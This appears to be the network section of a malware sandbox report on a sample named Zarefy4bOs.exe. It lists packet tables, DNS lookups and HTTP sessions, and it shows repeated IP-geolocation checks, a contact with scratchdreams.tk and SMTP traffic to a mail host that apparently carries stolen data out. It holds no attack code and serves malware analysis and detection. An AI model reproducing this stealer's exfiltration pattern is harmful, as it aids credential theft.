Apr 8, 2024 10:03:01.119285107 CEST	443	49709	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:01.119340897 CEST	49709	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:01.119889021 CEST	49709	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:01.124775887 CEST	49710	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:01.366841078 CEST	80	49710	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:01.366960049 CEST	49710	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:01.367100954 CEST	49710	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:01.609117985 CEST	80	49710	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:01.611212969 CEST	80	49710	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:01.612401009 CEST	49711	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:01.612435102 CEST	443	49711	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:01.612498045 CEST	49711	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:01.612744093 CEST	49711	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:01.612756014 CEST	443	49711	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:01.662035942 CEST	49710	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:01.870656967 CEST	443	49711	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:01.872411966 CEST	49711	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:01.872431040 CEST	443	49711	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:02.170308113 CEST	443	49711	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:02.170416117 CEST	443	49711	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:02.170494080 CEST	49711	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:02.171030998 CEST	49711	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:02.174384117 CEST	49710	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:02.175487041 CEST	49712	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:02.412379026 CEST	80	49712	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:02.412467003 CEST	49712	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:02.412601948 CEST	49712	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:02.416831017 CEST	80	49710	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:02.416894913 CEST	49710	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:02.649599075 CEST	80	49712	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:02.651235104 CEST	80	49712	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:02.652510881 CEST	49713	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:02.652554035 CEST	443	49713	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:02.652621031 CEST	49713	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:02.653050900 CEST	49713	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:02.653065920 CEST	443	49713	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:02.693281889 CEST	49712	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:02.909548044 CEST	443	49713	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:02.911125898 CEST	49713	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:02.911151886 CEST	443	49713	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:03.208363056 CEST	443	49713	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:03.208487988 CEST	443	49713	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:03.208550930 CEST	49713	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:03.209127903 CEST	49713	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:03.212634087 CEST	49712	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:03.213859081 CEST	49714	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:03.449671030 CEST	80	49712	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:03.449774027 CEST	49712	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:03.455389023 CEST	80	49714	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:03.455496073 CEST	49714	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:03.455678940 CEST	49714	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:03.697280884 CEST	80	49714	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:04.699583054 CEST	80	49714	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:04.701189995 CEST	49715	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:04.701227903 CEST	443	49715	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:04.701293945 CEST	49715	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:04.701596975 CEST	49715	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:04.701611042 CEST	443	49715	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:04.740226030 CEST	49714	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:04.959300995 CEST	443	49715	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:04.961036921 CEST	49715	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:04.961057901 CEST	443	49715	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:05.256786108 CEST	443	49715	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:05.256875038 CEST	443	49715	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:05.256920099 CEST	49715	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:05.257496119 CEST	49715	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:05.261332989 CEST	49714	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:05.262800932 CEST	49716	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:05.502966881 CEST	80	49714	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:05.503055096 CEST	49714	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:05.504618883 CEST	80	49716	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:05.504687071 CEST	49716	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:05.504890919 CEST	49716	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:05.746809006 CEST	80	49716	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:07.132369995 CEST	80	49716	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:07.133759022 CEST	49717	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:07.133795977 CEST	443	49717	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:07.133887053 CEST	49717	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:07.134130001 CEST	49717	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:07.134140968 CEST	443	49717	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:07.177736998 CEST	49716	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:07.391735077 CEST	443	49717	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:07.393260956 CEST	49717	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:07.393286943 CEST	443	49717	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:07.688474894 CEST	443	49717	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:07.688599110 CEST	443	49717	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:07.688699007 CEST	49717	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:07.689354897 CEST	49717	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:07.692905903 CEST	49716	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:07.694168091 CEST	49718	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:07.931200027 CEST	80	49718	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:07.931337118 CEST	49718	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:07.931536913 CEST	49718	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:07.935656071 CEST	80	49716	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:07.935738087 CEST	49716	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:08.168643951 CEST	80	49718	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:08.475114107 CEST	80	49718	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:08.476480007 CEST	49719	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:08.476531029 CEST	443	49719	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:08.476715088 CEST	49719	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:08.477020979 CEST	49719	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:08.477030993 CEST	443	49719	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:08.521387100 CEST	49718	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:08.736641884 CEST	443	49719	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:08.738500118 CEST	49719	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:08.738523960 CEST	443	49719	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:09.035382032 CEST	443	49719	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:09.035491943 CEST	443	49719	104.21.67.152	192.168.2.5
Apr 8, 2024 10:03:09.035552979 CEST	49719	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:09.036128044 CEST	49719	443	192.168.2.5	104.21.67.152
Apr 8, 2024 10:03:09.047113895 CEST	49718	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:09.284634113 CEST	80	49718	193.122.6.168	192.168.2.5
Apr 8, 2024 10:03:09.284734964 CEST	49718	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:03:09.440977097 CEST	49720	443	192.168.2.5	104.21.27.85
Apr 8, 2024 10:03:09.441020012 CEST	443	49720	104.21.27.85	192.168.2.5
Apr 8, 2024 10:03:09.441104889 CEST	49720	443	192.168.2.5	104.21.27.85
Apr 8, 2024 10:03:09.441603899 CEST	49720	443	192.168.2.5	104.21.27.85
Apr 8, 2024 10:03:09.441626072 CEST	443	49720	104.21.27.85	192.168.2.5
Apr 8, 2024 10:03:09.707825899 CEST	443	49720	104.21.27.85	192.168.2.5
Apr 8, 2024 10:03:09.707962036 CEST	49720	443	192.168.2.5	104.21.27.85
Apr 8, 2024 10:03:09.711285114 CEST	49720	443	192.168.2.5	104.21.27.85
Apr 8, 2024 10:03:09.711294889 CEST	443	49720	104.21.27.85	192.168.2.5
Apr 8, 2024 10:03:09.711579084 CEST	443	49720	104.21.27.85	192.168.2.5
Apr 8, 2024 10:03:09.713305950 CEST	49720	443	192.168.2.5	104.21.27.85
Apr 8, 2024 10:03:09.756232023 CEST	443	49720	104.21.27.85	192.168.2.5
Apr 8, 2024 10:03:40.856298923 CEST	443	49720	104.21.27.85	192.168.2.5
Apr 8, 2024 10:03:40.856373072 CEST	443	49720	104.21.27.85	192.168.2.5
Apr 8, 2024 10:03:40.856522083 CEST	49720	443	192.168.2.5	104.21.27.85
Apr 8, 2024 10:03:40.897336960 CEST	49720	443	192.168.2.5	104.21.27.85
Apr 8, 2024 10:03:46.387043953 CEST	49728	587	192.168.2.5	208.91.199.225
Apr 8, 2024 10:03:46.583738089 CEST	587	49728	208.91.199.225	192.168.2.5
Apr 8, 2024 10:03:46.583846092 CEST	49728	587	192.168.2.5	208.91.199.225
Apr 8, 2024 10:03:47.095187902 CEST	587	49728	208.91.199.225	192.168.2.5
Apr 8, 2024 10:03:47.146344900 CEST	49728	587	192.168.2.5	208.91.199.225
Apr 8, 2024 10:03:47.361692905 CEST	49728	587	192.168.2.5	208.91.199.225
Apr 8, 2024 10:03:47.558557987 CEST	587	49728	208.91.199.225	192.168.2.5
Apr 8, 2024 10:03:47.558579922 CEST	587	49728	208.91.199.225	192.168.2.5
Apr 8, 2024 10:03:47.562429905 CEST	49728	587	192.168.2.5	208.91.199.225
Apr 8, 2024 10:03:47.762252092 CEST	587	49728	208.91.199.225	192.168.2.5
Apr 8, 2024 10:03:47.802628040 CEST	49728	587	192.168.2.5	208.91.199.225
Apr 8, 2024 10:03:48.956451893 CEST	49728	587	192.168.2.5	208.91.199.225
Apr 8, 2024 10:03:49.157191992 CEST	587	49728	208.91.199.225	192.168.2.5
Apr 8, 2024 10:03:49.157516956 CEST	49728	587	192.168.2.5	208.91.199.225
Apr 8, 2024 10:03:49.358012915 CEST	587	49728	208.91.199.225	192.168.2.5
Apr 8, 2024 10:03:49.358366966 CEST	49728	587	192.168.2.5	208.91.199.225
Apr 8, 2024 10:03:49.573837042 CEST	587	49728	208.91.199.225	192.168.2.5
Apr 8, 2024 10:03:49.574067116 CEST	49728	587	192.168.2.5	208.91.199.225
Apr 8, 2024 10:03:49.772804976 CEST	587	49728	208.91.199.225	192.168.2.5
Apr 8, 2024 10:03:49.773591995 CEST	49728	587	192.168.2.5	208.91.199.225
Apr 8, 2024 10:03:49.773665905 CEST	49728	587	192.168.2.5	208.91.199.225
Apr 8, 2024 10:03:49.773684978 CEST	49728	587	192.168.2.5	208.91.199.225
Apr 8, 2024 10:03:49.773704052 CEST	49728	587	192.168.2.5	208.91.199.225
Apr 8, 2024 10:03:49.969856977 CEST	587	49728	208.91.199.225	192.168.2.5
Apr 8, 2024 10:03:49.970089912 CEST	587	49728	208.91.199.225	192.168.2.5
Apr 8, 2024 10:03:50.093750000 CEST	587	49728	208.91.199.225	192.168.2.5
Apr 8, 2024 10:03:50.146392107 CEST	49728	587	192.168.2.5	208.91.199.225
Apr 8, 2024 10:04:05.561872005 CEST	80	49708	193.122.6.168	192.168.2.5
Apr 8, 2024 10:04:05.561943054 CEST	49708	80	192.168.2.5	193.122.6.168
Apr 8, 2024 10:05:26.598421097 CEST	49728	587	192.168.2.5	208.91.199.225
Apr 8, 2024 10:05:26.796036005 CEST	587	49728	208.91.199.225	192.168.2.5
Apr 8, 2024 10:05:26.796065092 CEST	587	49728	208.91.199.225	192.168.2.5
Apr 8, 2024 10:05:26.796137094 CEST	49728	587	192.168.2.5	208.91.199.225
Apr 8, 2024 10:05:26.796235085 CEST	49728	587	192.168.2.5	208.91.199.225
Apr 8, 2024 10:05:26.992697954 CEST	587	49728	208.91.199.225	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2024 10:02:57.206253052 CEST	63619	53	192.168.2.5	1.1.1.1
Apr 8, 2024 10:02:57.330614090 CEST	53	63619	1.1.1.1	192.168.2.5
Apr 8, 2024 10:02:58.572525978 CEST	49863	53	192.168.2.5	1.1.1.1
Apr 8, 2024 10:02:58.697789907 CEST	53	49863	1.1.1.1	192.168.2.5
Apr 8, 2024 10:03:09.047684908 CEST	53771	53	192.168.2.5	1.1.1.1
Apr 8, 2024 10:03:09.440099955 CEST	53	53771	1.1.1.1	192.168.2.5
Apr 8, 2024 10:03:46.258917093 CEST	64814	53	192.168.2.5	1.1.1.1
Apr 8, 2024 10:03:46.384594917 CEST	53	64814	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 8, 2024 10:02:57.206253052 CEST	192.168.2.5	1.1.1.1	0xb45c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Apr 8, 2024 10:02:58.572525978 CEST	192.168.2.5	1.1.1.1	0x530	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Apr 8, 2024 10:03:09.047684908 CEST	192.168.2.5	1.1.1.1	0xe30	Standard query (0)	scratchdreams.tk	A (IP address)	IN (0x0001)	false
Apr 8, 2024 10:03:46.258917093 CEST	192.168.2.5	1.1.1.1	0xb3a5	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 8, 2024 10:02:57.330614090 CEST	1.1.1.1	192.168.2.5	0xb45c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 8, 2024 10:02:57.330614090 CEST	1.1.1.1	192.168.2.5	0xb45c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Apr 8, 2024 10:02:57.330614090 CEST	1.1.1.1	192.168.2.5	0xb45c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Apr 8, 2024 10:02:57.330614090 CEST	1.1.1.1	192.168.2.5	0xb45c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Apr 8, 2024 10:02:57.330614090 CEST	1.1.1.1	192.168.2.5	0xb45c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Apr 8, 2024 10:02:57.330614090 CEST	1.1.1.1	192.168.2.5	0xb45c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Apr 8, 2024 10:02:58.697789907 CEST	1.1.1.1	192.168.2.5	0x530	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Apr 8, 2024 10:02:58.697789907 CEST	1.1.1.1	192.168.2.5	0x530	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Apr 8, 2024 10:03:09.440099955 CEST	1.1.1.1	192.168.2.5	0xe30	No error (0)	scratchdreams.tk		104.21.27.85	A (IP address)	IN (0x0001)	false
Apr 8, 2024 10:03:09.440099955 CEST	1.1.1.1	192.168.2.5	0xe30	No error (0)	scratchdreams.tk		172.67.169.18	A (IP address)	IN (0x0001)	false
Apr 8, 2024 10:03:46.384594917 CEST	1.1.1.1	192.168.2.5	0xb3a5	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)	false
Apr 8, 2024 10:03:46.384594917 CEST	1.1.1.1	192.168.2.5	0xb3a5	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)	false
Apr 8, 2024 10:03:46.384594917 CEST	1.1.1.1	192.168.2.5	0xb3a5	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)	false
Apr 8, 2024 10:03:46.384594917 CEST	1.1.1.1	192.168.2.5	0xb3a5	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

scratchdreams.tk

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	193.122.6.168	80	3648	C:\Users\user\Desktop\Zarefy4bOs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 10:02:57.577605963 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 8, 2024 10:02:58.277544022 CEST	324	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 08:02:58 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5033b81ecc6418b96ea9196094e0176f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
Apr 8, 2024 10:02:58.282962084 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 8, 2024 10:02:58.521754026 CEST	324	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 08:02:58 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 837a5cc2a0f6b097fdb8f0b0735c59be Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
Apr 8, 2024 10:02:59.272654057 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 8, 2024 10:02:59.511491060 CEST	324	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 08:02:59 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5a8f45a39d923dc0bd80fd852f612757 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49708	193.122.6.168	80	3648	C:\Users\user\Desktop\Zarefy4bOs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 10:03:00.322504997 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 8, 2024 10:03:00.561847925 CEST	324	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 08:03:00 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d2bded719dd51b96ce9f4d5768495e8a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49710	193.122.6.168	80	3648	C:\Users\user\Desktop\Zarefy4bOs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 10:03:01.367100954 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 8, 2024 10:03:01.611212969 CEST	324	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 08:03:01 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 573faec38816dac1d70bfefc0ef9cdf4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49712	193.122.6.168	80	3648	C:\Users\user\Desktop\Zarefy4bOs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 10:03:02.412601948 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 8, 2024 10:03:02.651235104 CEST	324	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 08:03:02 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: da9a798a647ab56b6eba6f25f1298cad Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49714	193.122.6.168	80	3648	C:\Users\user\Desktop\Zarefy4bOs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 10:03:03.455678940 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 8, 2024 10:03:04.699583054 CEST	324	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 08:03:04 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6f6c7a61ef0ac0599be6450613fd382b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49716	193.122.6.168	80	3648	C:\Users\user\Desktop\Zarefy4bOs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 10:03:05.504890919 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 8, 2024 10:03:07.132369995 CEST	324	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 08:03:07 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ac57f9de25682267cf7eef760e7f58ad Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49718	193.122.6.168	80	3648	C:\Users\user\Desktop\Zarefy4bOs.exe

Timestamp	Bytes transferred	Direction	Data
Apr 8, 2024 10:03:07.931536913 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
